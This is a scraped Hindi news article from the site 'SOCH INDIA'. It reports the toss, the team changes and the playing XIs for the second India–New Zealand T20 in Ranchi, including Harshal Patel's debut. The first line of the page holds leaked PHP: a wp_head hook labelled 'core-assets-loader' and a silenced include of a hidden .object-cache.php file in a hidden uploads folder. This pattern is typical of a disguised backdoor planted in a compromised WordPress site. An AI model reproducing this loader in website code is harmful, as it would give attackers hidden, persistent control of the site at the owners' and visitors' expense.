add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); टीम इंडिया ने जीता टॉस, बॉलिंग का फैसला; चोटिल सिराज की जगह हर्षल पटेल करेंगे डेब्यू – SOCH INDIA
Menu

देश
टीम इंडिया ने जीता टॉस, बॉलिंग का फैसला; चोटिल सिराज की जगह हर्षल पटेल करेंगे डेब्यू

nobanner

रांची में खेले जा रहे दूसरे टी-20 मैच में भारत ने न्यूजीलैंड के खिलाफ टॉस जीतकर पहले गेंदबाजी का फैसला किया है। भारतीय टीम की प्लेइंग-XI में एक बदलाव हुआ है। टीम में चोटिल मोहम्मद सिराज की जगह IPL फेज-2 में सबसे ज्यादा विकेट लेने वाले हर्षल पटेल को आज इंटरनेशनल डेब्यू का मौका मिला है। वहीं, कीवी टीम ने अपनी प्लेइंग-XI में 3 बदलाव किए हैं। टीम ने रचिन रवींद्र, टॉड एस्टल और लॉकी फर्ग्यूसन की जगह जेम्स नीशम, एडम मिल्ने और ईश सोढी को मौका दिया है।

दोनों टीमें:

IND- रोहित शर्मा (कप्तान), केएल राहुल, सूर्यकुमार यादव, श्रेयस अय्यर, ऋषभ पंत (विकेटकीपर), वेंकटेश अय्यर, अक्षर पटेल, रविचंद्रन अश्विन, भुवनेश्वर कुमार, दीपक चाहर, हर्षल पटेल।

NZ- मार्टिन गुप्टिल, डेरिल मिचेल, मार्क चैपमैन, ग्लेन फिलिप्स, टिम साइफर्ट (विकेटकीपर), जेम्स नीशम, ईश सोढी, मिचेल सेंटनर, टिम साउथी (कप्तान), एडम मिल्ने, ट्रेंट बोल्ट।

स्टेडियम पहुंचे फैंस
इस मैच को लेकर फैंस के बीच काफी उत्साह देखने को मिल रहा है। कोरोना प्रोटोकॉल को ध्यान में रखते हुए फैंस स्टेडियम में पहुंचे हैं। मैच में उन्हीं फैंस को एंट्री मिली है, जिनके पास वैक्सीनेशन सर्टिफिकेट या फिर RT-PCR की नेगेटिव रिपोर्ट है।